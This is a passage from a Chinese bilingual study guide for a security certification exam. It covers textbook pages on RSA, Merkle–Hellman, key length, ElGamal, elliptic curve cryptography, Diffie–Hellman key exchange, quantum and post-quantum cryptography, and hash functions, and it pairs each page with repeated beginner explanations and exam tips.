标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 430 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 05 / PDF P431

第 431 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Bob's public key and n is the product of p and q created during the key generation process): C = Pe mod n When Bob receives the message, he performs the following calculation to retrieve the plaintext message: P = Cd mod n Merkle–Hellman Knapsack Another early asymmetric algorithm, the Merkle–Hellman Knapsack cryptosystem, was developed the year after RSA was publicized. Like RSA, it's based on the difficulty of performing factoring operations, but it relies on a component of set theory known as super-increasing sequence rather than on large prime numbers. Merkle–Hellman was proven ineffective when it was broken in 1984.

中文直译 / 整理

鲍勃的公钥,n是密钥生成过程中创建的p和q的乘积): C = Pe mod n 当鲍勃收到消息时,他执行以下计算以恢复明文消息: P = Cd mod n Merkle–Hellman 背包 另一种早期的非对称算法——Merkle–Hellman背包密码系统,是在RSA 公布后一年开发的。 与RSA类似,它基于因式分解运算的难度,但其依赖 的是集合论中的一个组成部分——超递增序列,而非大素数。 Merkle– Hellman在1984年被破解后被证明是无效的。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 431 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 06 / PDF P432

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Importance of Key Length The length of the cryptographic key is perhaps the most important security parameter that can be set at the discretion of the security administrator. It's important to understand the capabilities of your encryption algorithm and choose a key length that provides an appropriate level of protection. This judgment can be made by weighing the difficulty of defeating a given key length (measured in the amount of processing time required to defeat the cryptosystem) against the importance of the data. Generally speaking, the more critical your data, the stronger the key you should use to protect that data. Timeliness of the data is also an important consideration.

You must take into account the rapid growth of computing power—Moore's law suggests that computing power doubles approximately every two years. If it takes current computers one year of processing time to break your code, it will take only three months if the attempt is made with contemporary technology about four years down the road. If you expect that your data will still be sensitive at that time, you should choose a much longer cryptographic key that will remain secure well into the future. Also, as attackers are now able to leverage cloud computing resources, they are able to more efficiently attack encrypted data.

The cloud allows attackers to rent scalable computing power, including powerful graphic processing units (GPUs) on a per-hour basis, and offers significant discounts when using excess capacity during nonpeak hours. This brings powerful computing well within the reach of many attackers. The strengths of various key lengths also vary greatly according to the cryptosystem you're using. The key lengths shown in the following table for three cryptosystems all provide equal protection because of differences in the way that the algorithms use the keying material: Cryptosystem Key length Symmetric 128 bits RSA 3,072 bits Elliptic curve cryptography 256 bits

中文直译 / 整理

密钥长度的重要性 加密密钥的长度或许是安全管理员可以自行设定的最重要的安全参数。 理 解您的加密算法的能力并选择能提供适当保护级别的密钥长度至关重要。 这一判断可以通过权衡破解给定密钥长度的难度(以破解密码系统所需的 处理时间来衡量)与数据的重要性来做出。 一般来说,您的数据越重要,就应该使用越强的密钥来保护这些数据。 数 据的时效性也是一个重要的考虑因素。 您必须考虑到计算能力的快速增长—— 摩尔定律表明,计算能力大约每两年翻一番。 如果当前的计算机需要一年 的处理时间才能破解您的代码,那么四年后的现代技术只需三个月即可完 成破解。 如果您预计到那时您的数据仍然敏感,您应选择更长的加密密钥, 以确保其在未来很长一段时间内依然安全。 此外,由于攻击者现在能够利用云计算资源,他们能够更高效地攻击加密 数据。 云平台允许攻击者按小时租用可扩展的计算能力,包括强大的图形 处理器(GPU),并在非高峰时段使用过剩容量时提供大幅折扣。 这使得 强大的计算能力对许多攻击者而言触手可及。 不同密钥长度的强度也因您所使用的密码系统而有很大差异。

下表中三个 密码系统的密钥长度均提供了同等的安全保护,这是因为各算法在使用密 钥材料的方式上存在差异: 密码系统 密钥长度 对称 128 位 RSA 3,072 位 椭圆曲线密码学 256 位

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 07 / PDF P433

第 433 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

ElGamal In Chapter 6, you learned how the Diffie–Hellman algorithm uses large integers and modular arithmetic to facilitate the secure exchange of secret keys over insecure communications channels. In 1985, Dr. Taher Elgamal published an article describing how the mathematical principles behind the Diffie–Hellman key exchange algorithm could be extended to support an entire public key cryptosystem used for encrypting and decrypting messages. At the time of its release, one of the major advantages of ElGamal over the RSA algorithm was that it was released into the public domain.

Elgamal did not obtain a patent on his extension of Diffie–Hellman, and it is freely available for use, unlike the then-patented RSA technology. (RSA released its algorithm into the public domain in 2000.) However, ElGamal also has a major disadvantage—the algorithm doubles the size of any message that it encrypts. This presents a major hardship when encrypting large amounts of data that must be sent over a network. Elliptic Curve Cryptography The same year that Elgamal published his algorithm, two other mathematicians, Neal Koblitz from the University of Washington and Victor Miller from IBM, independently proposed the application of elliptic curve cryptography (ECC).

The mathematical concepts behind elliptic curve cryptography are quite complex and well beyond the scope of this book. However, you should be generally familiar with the elliptic curve algorithm and its potential applications. If you are interested in learning the detailed mathematics behind elliptic curve cryptosystems, an excellent tutorial exists at www.certicom.com/content/certicom/en/ecctutorial.html. Any elliptic curve can be defined by the following equation: y2 = x3 + ax + b In this equation, x, y, a, and b are all real numbers. Each elliptic curve has a corresponding elliptic curve group made up of the points on the elliptic curve ElGamal

中文直译 / 整理

在 第6章中,您了解了Diffie–Hellman算法如何利用大整数和模算术在不安 全的通信信道上实现密钥的安全交换。 1985年,Taher Elgamal博士发表了 一篇文章,描述了如何将Diffie–Hellman密钥交换算法背后的数学原理扩展, 以支持用于加密和解密消息的完整公钥密码系统。 在发布时,ElGamal 相比 RSA 算法的一个主要优势是它被发布到了公共领域。 ElGamal 没有对其对 Diffie–Hellman 的扩展申请专利,因此可以免费使用, 而当时的 RSA 技术则受到专利保护。 (RSA 于 2000 年将其算法发布到公共 领域。 ) 然而,ElGamal 也有一个主要缺点——该算法会将任何加密消息的大小翻倍。 当需要通过网络传输大量数据时,这会带来重大困难。 椭圆曲线密码学 就在 ElGamal 发布其算法的同一年,两位其他数学家——华盛顿大学的 Neal Koblitz 和 IBM 的 Victor Miller——独立提出了将 椭圆曲线密码学 (ECC) 应用于密码学的方案。 椭圆曲线密码学背后的数学概念非常复杂,远远超出了本书的范围。 但您应大致熟悉椭圆曲线算法及其潜在应用。

如果您希望了解椭圆曲线密 码系统背后的详细数学原理,一个优秀的教程位于 www.certicom.com/content/certicom/en/ecc-tutorial.html。 任何椭圆曲线都可以由以下方程定义: y2 = x3 + ax + b 在这个方程中,x、y、a 和 b 都是实数。 每条椭圆曲线都对应一个由椭圆曲线上的 点组成的椭圆曲线群

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 433 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 08 / PDF P434

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

along with the point O, located at infinity. Two points within the same elliptic curve group (P and Q) can be added together with an elliptic curve addition algorithm. This operation is expressed, quite simply, as follows: P + Q This problem can be extended to involve multiplication by assuming that Q is a multiple of P, meaning the following: Q = k.P Computer scientists and mathematicians believe that it is extremely hard to find the integer k, even if P and Q are already known. This difficult problem, known as the elliptic curve discrete logarithm problem (ECDLP), forms the basis of elliptic curve cryptography.

It is widely believed that this problem is harder to solve than both the prime factorization problem that the RSA cryptosystem is based on and the standard discrete logarithm problem (DLP) utilized by Diffie–Hellman and ElGamal. This is illustrated by the data shown in the table in the sidebar “Importance of Key Length,” which noted that a 3,072-bit RSA key is cryptographically equivalent to a 256-bit elliptic curve cryptosystem key. Diffie–Hellman Key Exchange In Chapter 6, you learned how the Diffie–Hellman algorithm is an approach to key exchange that allows two individuals to generate a shared secret key over an insecure communications channel.

With knowledge of asymmetric cryptography under your belt, we can now dive a little more into the details of how this algorithm actually works, as Diffie–Hellman key exchange is an example of public key cryptography. The beauty of this algorithm lies in the ability of two users to generate a shared secret that they both know without ever actually transmitting that secret. Hence, they may use public key cryptography to generate a shared secret key that they then use to communicate with a symmetric encryption algorithm. This is one example of an approach known as hybrid cryptography, which we discuss in more detail later in this chapter.

The Diffie–Hellman algorithm works by using the mathematics of prime numbers, similar to the RSA algorithm. Imagine that Richard and Sue would like to communicate over a secure, encrypted connection but they are in different places and have no shared secret key. Richard or Sue could simply create such a key, but then they would have no way to share it with each

中文直译 / 整理

以及位于无穷远处的点O。 同一椭圆曲线群中的两个点(P 和 Q)可以通过椭圆 曲线加法算法相加。 该运算简单表示如下: P + Q 这个问题可以通过假设Q是P的倍数来扩展到涉及乘法的情况,即: Q = k.P 计算机科学家和数学家认为,即使P和Q已知,找到整数k也极其困难。 这个困 难的问题被称为椭圆曲线离散对数问题(ECDLP),它是椭圆曲线密码学的基 础。 人们普遍认为,这个问题比RSA密码系统所基于的素数分解问题以及 Diffie–Hellman和ElGamal所使用的标准离散对数问题(DLP)更难解决。 这一点由侧边栏“密钥长度的重要性”中的表格数据所说明,其中指出, 3,072位的RSA密钥在密码学上等价于256位的椭圆曲线密码系统密钥。 Diffie–Hellman密钥交换 在第6章中,您学习了Diffie–Hellman算法是一种密钥交换方法,允许两个人 通过不安全的通信信道生成共享密钥。 在掌握了非对称密码学的知识后,我们 现在可以更深入地探讨该算法的具体工作原理,因为Diffie–Hellman密钥交换 是公钥密码学的一个示例。

该算法的美妙之处在于,两个用户能够生成一个双方都知道的共享密钥,而 无需实际传输该密钥。 因此,他们可以使用公钥密码学生成一个共享密钥, 然后使用该密钥通过对称加密算法进行通信。 这是被称为混合密码学的一种 方法的示例,我们将在本章后面更详细地讨论它。 Diffie–Hellman 算法通过使用素数的数学原理工作,类似于 RSA 算法。 假 设理查德和苏希望通过安全的加密连接进行通信,但他们身处不同地点,且没 有共享的密钥。 理查德或苏可以简单地生成这样一个密钥,但他们无法在不被 窃听者截获的情况下将其共享给对方

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 09 / PDF P435

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

other without exposing it to eavesdropping. So, instead, they use the Diffie– Hellman algorithm, following this process: 1. Richard and Sue agree on two large numbers: p (which is a prime number) and g (which is an integer), such that 1 < g < p. 2. Richard chooses a large random integer r and performs the following calculation: R = gr mod p 3. Sue chooses a large random integer s and performs the following calculation: S = gs mod p 4. Richard sends R to Sue and Sue sends S to Richard. 5. Richard then performs this calculation: K = Sr mod p 6.

Sue then performs this calculation: K = Rs mod p At this point, Richard and Sue both have the same value, K, and can use this for secret key communication between the two parties. It is important to note that Diffie–Hellman is not an encryption protocol in and of itself. It is technically a key exchange protocol. However, it is commonly used to create a shared secret key for use in Transport Layer Security (TLS), where it is referred to as either DHE (Diffie-Hellman Ephemeral) or EDH (Ephemeral Diffie-Hellman. We discuss this use of Diffie–Hellman later in this chapter. The Diffie–Hellman key exchange algorithm relies on the use of large prime numbers.

The ECDHE (Elliptic Curve Diffie-Hellman Ephemeral) key exchange algorithm is a variant of this approach that uses the elliptic curve problem to perform a similar shared secret key agreement process.

中文直译 / 整理

彼此,而不会暴露给窃听者。 因此,他们改用 Diffie–Hellman 算法,按照以下 过程进行: 1. 理查德和苏同意两个大数:p(这是一个质数)和g(这是一个整数), 满足1 < g < p。 2. 理查德选择一个大的随机整数r,并执行以下计算: R = gr mod p 3. 苏选择一个大的随机整数s,并执行以下计算: S = gs mod p 4. 理查德将R发送给苏,苏将S发送给理查德。 5. 理查德然后执行以下计算: K = Sr mod p 6. 苏然后执行以下计算: K = Rs mod p 此时,理查德和苏都拥有相同的值 K,并可以使用该值在双方之间进行密钥通信。 需要注意的是,Diffie–Hellman 本身并不是一种加密协议,而是一种密钥 交换协议。 然而,它通常用于创建共享密钥,以在传输层安全(TLS)中使 用,此时它被称为 DHE(临时 Diffie‑Hellman)或 EDH(临时 Diffie‑Hellman)。 我们将在本章后面讨论 Diffie–Hellman 的这种用法。 Diffie–Hellman密钥交换算法依赖于大素数的使用。

ECDHE(椭 圆曲线迪菲‑赫尔曼临时)密钥交换算法是这一方法的变体,它利用椭圆 曲线问题来执行类似的共享密钥协商过程。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 10 / PDF P436

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Quantum Cryptography Quantum computing is an area of advanced theoretical research in computer science and physics. The theory behind them is that we can use principles of quantum mechanics to replace the binary 1 and 0 bits of digital computing with multidimensional quantum bits known as qubits. Quantum computing remains an emerging field, and currently, quantum computers are confined to theoretical research. Nobody has yet developed a practical implementation of a useful quantum computer.

That said, if quantum computers do come on the scene, they have the potential to revolutionize the world of computer science by providing the technological foundation for the most powerful computers ever developed. Those computers would quickly upend many of the principles of modern cybersecurity. The most significant impact of quantum computing on the world of cryptography resides in the potential that quantum computers may be able to solve problems that are not possible to solve on contemporary computers. This concept is known as quantum supremacy and, if achieved, may be able to easily solve the factorization problems upon which many classical asymmetric encryption algorithms rely.

If this occurs, it could render popular algorithms such as RSA and Diffie–Hellman insecure. However, quantum computers may also be used to create newer, more complex cryptographic algorithms. These quantum cryptography systems may be more resistant to quantum attacks and could usher in a new era of cryptography. Researchers have already developed lab implementations of quantum key distribution (QKD), an approach to use quantum computing to create a shared secret key between two users, similar to the goal of the Diffie–Hellman algorithm. Like quantum cryptography in general, QKD has not yet reached the stage of practical use.

中文直译 / 整理

量子密码学 量子计算是计算机科学和物理学中的一个高级理论研究领域。 其理论基础是, 我们可以利用量子力学原理,将数字计算中的二进制1和0位替换为称为量子比 特的多维量子位。 量子计算仍是一个新兴领域,目前量子计算机仅限于理论研究。 尚未有人开 发出实用的量子计算机。 然而,如果量子计算机得以实现,它们有可能通过 提供有史以来最强大计算机的技术基础,彻底改变计算机科学领域。 这些计 算机将迅速颠覆现代网络安全的许多原理。 量子计算对密码学领域最重大的影响在于,量子计算机可能能够解决当代计算 机无法解决的问题。 这一概念被称为量子优越性,如果实现,可能轻松解决许 多经典非对称加密算法所依赖的因式分解问题。 如果这种情况发生,可能会使 RSA和Diffie–Hellman等流行算法变得不安全。 然而,量子计算机也可能用于创建更新、更复杂的加密算法。 这些量子密码学 系统可能对量子攻击更具抵抗力,并可能开启加密技术的新时代。 研究人员已 经开发出量子密钥分发(QKD)的实验室实现,这是一种利用量子计算在两个 用户之间创建共享密钥的方法,类似于Diffie–Hellman算法的目标。

与一般 的量子密码学一样,QKD尚未达到实际应用的阶段。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 11 / PDF P437

第 437 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Post-Quantum Cryptography The most practical implication of quantum computing today is that cybersecurity professionals should be aware of the length of time that their information will remain sensitive. It is possible that an attacker could retain stolen copies of encrypted data for an extended period of time and then use future developments in quantum computing to decrypt that data. If the data remains sensitive at that point, the organization may suffer injury. The most important point here for security professionals is that they must be thinking today about the security of their current data in a post-quantum world.

Also, it is quite possible that the first major practical applications of quantum computing to cryptanalytic attacks may occur in secret. An intelligence agency or other group discovering a practical means to break modern cryptography would benefit most if they kept that discovery secret and used it to their own advantage. It is even possible that such discoveries have already occurred in secret. Hash Functions Later in this chapter, you'll learn how cryptosystems implement digital signatures to provide proof that a message originated from a particular user of the cryptosystem and to ensure that the message was not modified while in transit between the two parties.

Before you can completely understand that concept, we must first explain the concept of hash functions. We will explore the basics of hash functions and look at several common hash functions used in modern digital signature algorithms. Hash functions have a very simple purpose—they take a potentially long message and generate a unique output value derived from the content of the message. This value is commonly referred to as the message digest. Message digests can be generated by the sender of a message and transmitted to the recipient along with the full message for two reasons. First, the recipient can use the same hash function to recompute the message digest from the full message.

They can then compare the computed message digest to the transmitted one to ensure that the message sent by the originator is the same one received by the recipient. If the message digests do

中文直译 / 整理

后量子密码学 量子计算如今最实际的影响是,网络安全专业人员应意识到其信息保持敏 感的时间长度。 攻击者有可能长期保存被盗的加密数据副本,然后利用未 来量子计算的发展来解密这些数据。 如果在那时数据仍然敏感,组织可能 会遭受损失。 对于安全专业人员而言,最重要的一点是,他们今天就必须 思考当前数据在后量子世界中的安全性。 此外,量子计算首次在密码分析攻击中的重大实际应用很可能在秘密中发 生。 情报机构或其他团体若发现了一种破解现代密码学的实际方法,最有 利的做法是保守这一发现的秘密,并利用它为自己谋取优势。 甚至有可能 此类发现早已在秘密中完成。 哈希函数 在本章稍后部分,您将学习密码系统如何实现数字签名,以证明消息源自密码 系统的特定用户,并确保消息在双方传输过程中未被修改。 在您完全理解这一 概念之前,我们首先需要解释哈希函数的概念。 我们将探讨哈希函数的基本原 理,并介绍现代数字签名算法中常用的几种哈希函数。 哈希函数的目的非常简单——它们接收一个可能很长的消息,并根据消息内容 生成一个唯一的输出值。 该值通常被称为消息摘要。 消息摘要可由消息发送方 生成,并与完整消息一起传输给接收方,原因有二。

首先,接收方可以使用相同的哈希函数,根据完整消息重新计算消息摘要。 然 后,他们可以将计算出的消息摘要与传输的消息摘要进行比较,以确保发送方 发送的消息与接收方收到的消息一致。 如果消息摘要不

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 437 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

哈希本身不提供机密性;它主要用于完整性校验。

签名支持完整性、真实性和不可否认性,不等于加密全文。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 12 / PDF P438

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

not match, that means the message was somehow modified while in transit. It is important to note that the messages must be exactly identical for the digests to match. If the messages have even a slight difference in spacing, punctuation, or content, the message digest values will be completely different. It is not possible to tell the degree of difference between two messages by comparing the digests. Even a slight difference will generate a totally different digest value. Second, the message digest can be used to implement a digital signature algorithm. This concept is covered in the section “Digital Signatures,” later in this chapter. In most cases, a message digest is 128 bits or larger.

